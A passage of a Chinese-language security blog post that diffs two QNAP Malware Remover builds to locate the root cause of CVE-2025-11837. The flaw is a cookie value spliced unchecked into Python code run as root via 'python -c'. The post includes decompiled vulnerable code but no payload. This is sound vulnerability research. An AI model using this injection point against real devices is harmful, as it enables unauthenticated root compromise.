<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞" />
<meta name="author" content="imjdl" />
<meta property="og:locale" content="en" />
<meta name="description" content="背景" />
<meta property="og:description" content="背景" />
<link rel="canonical" href="/posts/blog_cve_2025_11837_cn/" />
<meta property="og:url" content="/posts/blog_cve_2025_11837_cn/" />
<meta property="og:site_name" content="imjdl blog" />
<meta property="og:image" content="/assets/img/20260622/logo.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2026-06-22T12:34:00+08:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/img/20260622/logo.png" />
<meta property="twitter:title" content="CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞" />
<meta name="twitter:site" content="@Mortyjin" />
<meta name="twitter:creator" content="@MortyJin" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"imjdl","url":"https://github.com/imjdl/"},"dateModified":"2026-06-22T12:34:00+08:00","datePublished":"2026-06-22T12:34:00+08:00","description":"背景","headline":"CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞","image":"/assets/img/20260622/logo.png","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/blog_cve_2025_11837_cn/"},"url":"/posts/blog_cve_2025_11837_cn/"}</script>
<!-- End Jekyll SEO tag -->


  <title>CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞 | imjdl blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="imjdl blog">
<meta name="application-name" content="imjdl blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js,npm/mermaid@11.4.0/dist/mermaid.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>


  <!-- MathJax -->
  <script async src="/assets/js/data/mathjax.js"></script>
  <script async src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6"></script>
  <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-chtml.js"></script>


<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/log.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">imjdl blog</a>
    <p class="site-subtitle fst-italic mb-0">Perpetual student, continual incremental improvement.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/reading-list/" class="nav-link">
            <i class="fa-fw fa fa-list-alt"></i>
            

            <span>READING LIST</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a
          href="https://github.com/imjdl"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
      

      
        <a
          href="https://twitter.com/Mortyjin"
          aria-label="twitter"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fa-brands fa-x-twitter"></i>
        </a>
      
    
      

      
        <a
          href="javascript:location.href = 'mailto:' + ['imelloit','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
      

      
        <a
          href="/feed.xml"
          aria-label="rss"
          

          

          

          
        >
          <i class="fas fa-rss"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1782102840"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jun 22, 2026
</time>

      </span>

      <!-- lastmod date -->
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/assets/img/20260622/logo.png" class="popup img-link preview-img shimmer"><img src="/assets/img/20260622/logo.png"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/imjdl/">imjdl</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="4196 words"
>
  <em>23 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">CVE-2025-11837 深度分析：QNAP Malware Remover Python 代码注入漏洞</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h2 id="背景"><span class="me-2">背景</span><a href="#背景" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>CVE-2025-11837 是一个影响 QNAP Malware Remover 的漏洞，CVSS 9.8，标注为网络可达、无需认证、无需用户交互。该漏洞最早在 Pwn2Own Ireland 2025 上被演示，QNAP 随后在 QSA-25-47 公告中修复，修复版本为 Malware Remover 6.6.8.20251023。公告中的技术信息仅有 CWE-94（代码注入）、影响版本范围、修复版本——没有 PoC，没有根因分析，没有漏洞定位。一个 CVSS 9.8 的未授权 RCE，公开资料中除了公告描述几乎空白。</p>

<p>值得注意的是，这不是 Malware Remover 第一次出现注入问题。2021 年的 QSA-21-16 就是同一个组件的命令注入。同一组件，同类问题，时隔数年再次出现。本次究竟是老问题复发，还是新的注入形式，仅凭公告无法判断，需要进一步分析。</p>

<p>本文记录从两个版本的 QPKG 包出发，定位、还原并验证漏洞根因的完整过程。</p>

<h2 id="摘要"><span class="me-2">摘要</span><a href="#摘要" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<ul>
  <li><strong>漏洞类型：</strong> <code class="language-plaintext highlighter-rouge">malware_remover.cgi</code> 将 HTTP Cookie 值无校验地拼入一段 Python 源码模板，随后用 <code class="language-plaintext highlighter-rouge">python -c</code> 执行该脚本，构成 Python 代码注入（CWE-94）</li>
  <li><strong>利用条件：</strong> 无需任何有效会话，单个 HTTP 请求即可触发；认证本身可被绕过</li>
  <li><strong>影响范围：</strong> 未认证的远程代码执行，目标进程权限为 <code class="language-plaintext highlighter-rouge">uid=0</code>（root）</li>
  <li><strong>前置条件：</strong> 仅需网络可达目标，无需凭据、无需用户交互</li>
  <li><strong>修复方式：</strong> 6.6.8 在拼接前对 cookie 值增加长度（≤32）与 <code class="language-plaintext highlighter-rouge">isalnum</code> 白名单双重校验</li>
</ul>

<h2 id="环境搭建"><span class="me-2">环境搭建</span><a href="#环境搭建" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>分析环境基于 QNAP 的虚拟化版本 QuTScloud（c5.1.7.2739）。两个版本的 Malware Remover 分别用于漏洞复现与修复对比：</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>组件</th>
      <th>版本</th>
      <th>文件</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>QuTScloud</td>
      <td>c5.1.7.2739</td>
      <td><code class="language-plaintext highlighter-rouge">QuTScloud_c5.1.7.2739.ova.zip</code></td>
    </tr>
    <tr>
      <td>Malware Remover（漏洞版）</td>
      <td>6.6.7.20250813_093505</td>
      <td><code class="language-plaintext highlighter-rouge">MalwareRemover-6.6.7.20250813_093505-x86_64.zip</code></td>
    </tr>
    <tr>
      <td>Malware Remover（修复版）</td>
      <td>6.6.8.20251023_151451</td>
      <td><code class="language-plaintext highlighter-rouge">MalwareRemover-6.6.8.20251023_151451-x86_64.zip</code></td>
    </tr>
  </tbody>
</table></div>

<p>搭建步骤如下：</p>

<ol>
  <li>解压 <code class="language-plaintext highlighter-rouge">QuTScloud_c5.1.7.2739.ova.zip</code>，得到 OVA 虚拟机镜像。</li>
  <li>将 OVA 导入虚拟机管理程序（VirtualBox / VMware 等）。</li>
  <li>启动虚拟机，完成 QuTScloud 初始化，确认 NAS 环境正常运行，Web 管理界面可访问。</li>
  <li>通过 App Center 将 Malware Remover 安装包导入虚拟机。由于需要对两个版本做对比，依次安装漏洞版本（6.6.7）与修复版本（6.6.8）。</li>
</ol>

<p><a href="/assets/img/20260622/20260701-152337.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152337.jpg" alt="" loading="lazy"></a></p>

<p><a href="/assets/img/20260622/20260701-152331.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152331.jpg" alt="" loading="lazy"></a></p>

<h2 id="样本与攻击面"><span class="me-2">样本与攻击面</span><a href="#样本与攻击面" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>两个版本都是完整的 QNAP QPKG 包，结构相同：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>MalwareRemover/
├── MalwareRemover-6.6.7/    ← 漏洞版本
└── MalwareRemover-6.6.8/    ← 修复版本
</pre></td></tr></tbody></table></code></div></div>

<p>每个包里核心文件分三类：</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">www/malware_remover.cgi</code> — C++ 编译的 CGI 二进制，HTTP 入口</li>
  <li><code class="language-plaintext highlighter-rouge">modules/*.pyc</code> — Python 2.7 字节码，承载业务逻辑</li>
  <li><code class="language-plaintext highlighter-rouge">MalwareRemover_exec</code> / <code class="language-plaintext highlighter-rouge">MalwareRemover_scan</code> — shc 加壳的辅助二进制</li>
</ul>

<p>Apache 配置中暴露的攻击面：</p>

<div class="language-apache highlighter-rouge"><div class="code-header">
        <span data-label-text="Apache"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nc">Alias</span> /malware_remover "/home/httpd/cgi-bin/qpkg/MalwareRemover"
<span class="nc">RewriteRule</span> "^scan/status/?"  "malware_remover.cgi?action=status"
<span class="nc">RewriteRule</span> "^scan/start/?"   "malware_remover.cgi?action=scan"
</pre></td></tr></tbody></table></code></div></div>

<p>CGI 通过 <code class="language-plaintext highlighter-rouge">action</code> 参数分发 <code class="language-plaintext highlighter-rouge">status</code>、<code class="language-plaintext highlighter-rouge">scan</code>、<code class="language-plaintext highlighter-rouge">stop</code>、<code class="language-plaintext highlighter-rouge">setting</code>、<code class="language-plaintext highlighter-rouge">background_task</code>、<code class="language-plaintext highlighter-rouge">about</code>、<code class="language-plaintext highlighter-rouge">system_status</code> 等动作。所有 rewrite 规则、shell 脚本、<code class="language-plaintext highlighter-rouge">.default</code> 模板在两个版本之间逐字节一致，差异完全落在二进制文件里。</p>

<h2 id="明文资源对比"><span class="me-2">明文资源对比</span><a href="#明文资源对比" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>拿到两套固件，第一步用排除法把差异范围压到最小，而非直接反编译。所有明文资源逐一对比：</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>文件</th>
      <th>结果</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">common.sh</code></td>
      <td>完全一致</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">MalwareRemover.sh</code></td>
      <td>完全一致</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">apache-malware_remover.conf</code></td>
      <td>完全一致</td>
    </tr>
    <tr>
      <td><code class="language-plaintext highlighter-rouge">modules/default/*.default</code></td>
      <td>完全一致</td>
    </tr>
  </tbody>
</table></div>

<p>明文资源零差异，差异位于 <code class="language-plaintext highlighter-rouge">malware_remover.cgi</code> 或 <code class="language-plaintext highlighter-rouge">.pyc</code> 内部。下一步对两个 ELF 二进制做导入表 diff。</p>

<h2 id="导入表-diff"><span class="me-2">导入表 diff</span><a href="#导入表-diff" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>对比两个版本 <code class="language-plaintext highlighter-rouge">malware_remover.cgi</code> 的 ELF 导入符号表，寻找新增或删除的库函数。结果是整个导入表里唯一的变化：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>6.6.7: 无 isalnum
6.6.8: isalnum@@GLIBC_2.2.5 (extern @ 0x21a998)  ← 唯一新增
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/20260622/20260701-152324.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152324.jpg" alt="" loading="lazy"></a></p>

<p>函数总数从 384 涨到 386，新增的两个里只有 <code class="language-plaintext highlighter-rouge">isalnum</code> 是业务相关的。其余像 <code class="language-plaintext highlighter-rouge">execvp</code>、<code class="language-plaintext highlighter-rouge">fork</code>、<code class="language-plaintext highlighter-rouge">pipe</code>、<code class="language-plaintext highlighter-rouge">dup2</code>、<code class="language-plaintext highlighter-rouge">sprintf</code>、<code class="language-plaintext highlighter-rouge">regcomp</code>、<code class="language-plaintext highlighter-rouge">regexec</code> 两版本完全一致。</p>

<p>根据这一条信息可以判断漏洞性质：</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">isalnum</code> 是字符白名单函数，等价于 <code class="language-plaintext highlighter-rouge">[A-Za-z0-9]</code></li>
  <li>CWE-94 的典型修复方式是「在执行外部输入前加输入校验」</li>
  <li><code class="language-plaintext highlighter-rouge">execvp</code>/<code class="language-plaintext highlighter-rouge">fork</code> 在两个版本中都存在，说明命令执行能力未被移除，而是在<strong>调用前增加了过滤</strong></li>
</ul>

<p>据此推断：修复方式是对某个外部输入增加 <code class="language-plaintext highlighter-rouge">isalnum</code> 白名单校验，目的是阻断代码注入。具体是哪个输入、注入到什么内容、如何执行，需要进一步分析。</p>

<h2 id="修复点定位"><span class="me-2">修复点定位</span><a href="#修复点定位" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p><code class="language-plaintext highlighter-rouge">isalnum</code> 为新增符号，其调用者即为修复发生的位置。追踪这个符号的交叉引用：</p>

<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="c1"># isalnum PLT thunk 的 xrefs
</span><span class="nf">xref_query</span><span class="p">(</span><span class="n">addr</span><span class="o">=</span><span class="mh">0x3330</span><span class="p">,</span> <span class="n">direction</span><span class="o">=</span><span class="sh">"</span><span class="s">to</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># → 唯一调用者: main @ 0x3a8d
</span>
<span class="c1"># 顺便查 execvp 的调用者
</span><span class="nf">xref_query</span><span class="p">(</span><span class="n">addr</span><span class="o">=</span><span class="mh">0x2e80</span><span class="p">,</span> <span class="n">direction</span><span class="o">=</span><span class="sh">"</span><span class="s">to</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># → 唯一调用者: popen_pipeline_exec @ 0x687c
</span></pre></td></tr></tbody></table></code></div></div>

<p><code class="language-plaintext highlighter-rouge">isalnum</code> 在整个 6.6.8 二进制中只有 <code class="language-plaintext highlighter-rouge">main</code> 函数一个调用点，地址 <code class="language-plaintext highlighter-rouge">0x3a8d</code>。<code class="language-plaintext highlighter-rouge">execvp</code> 仅在一个自实现的 popen 风格执行器中被调用。据此判断修复发生在 <code class="language-plaintext highlighter-rouge">main</code> 中，且与该执行器的调用链相关。</p>

<p>同时在 IDB 中对相关函数重命名，便于后续分析：</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>sub_9570 → popen_pipeline_exec       (popen 风格命令执行器)
sub_66F0 → popen_child_dup2_execvp   (子进程 dup2 + execvp)
main     → main_CVE_2025_11837_fixed (6.6.8) / _vulnerable (6.6.7)
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/20260622/20260701-152317.jpg" class="popup img-link  shimmer"><img src="/assets/img/20260622/20260701-152317.jpg" alt="" loading="lazy"></a></p>

<h2 id="反编译对比cookie-处理逻辑"><span class="me-2">反编译对比：cookie 处理逻辑</span><a href="#反编译对比cookie-处理逻辑" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>反编译两个版本的 <code class="language-plaintext highlighter-rouge">main</code>，对比调用了 <code class="language-plaintext highlighter-rouge">isalnum</code> 的循环。该循环处理 HTTP Cookie。</p>

<p>漏洞版 6.6.7（cookie 处理 @ <code class="language-plaintext highlighter-rouge">0x3b01</code>）：</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">v9</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v6</span><span class="p">;</span>                    <span class="c1">// cookie 值，无任何校验</span>
    <span class="n">snprintf</span><span class="p">(</span><span class="n">v114</span><span class="p">,</span> <span class="mh">0x400</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">byte_21A9C0</span><span class="p">,</span> <span class="n">v75</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">v9</span><span class="p">);</span>  <span class="c1">// v9 直接拼进字符串</span>
    <span class="n">sub_9570</span><span class="p">(</span><span class="n">s1</span><span class="p">,</span> <span class="mi">64</span><span class="p">,</span> <span class="o">::</span><span class="n">dest</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">unk_16294</span><span class="p">,</span> <span class="n">v114</span><span class="p">,</span> <span class="p">...);</span>   <span class="c1">// 用 v114 执行命令</span>
    <span class="c1">// ...</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>修复版 6.6.8（cookie 处理 @ <code class="language-plaintext highlighter-rouge">0x3a60</code>）：</p>

<div class="language-c highlighter-rouge"><div class="code-header">
        <span data-label-text="C"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
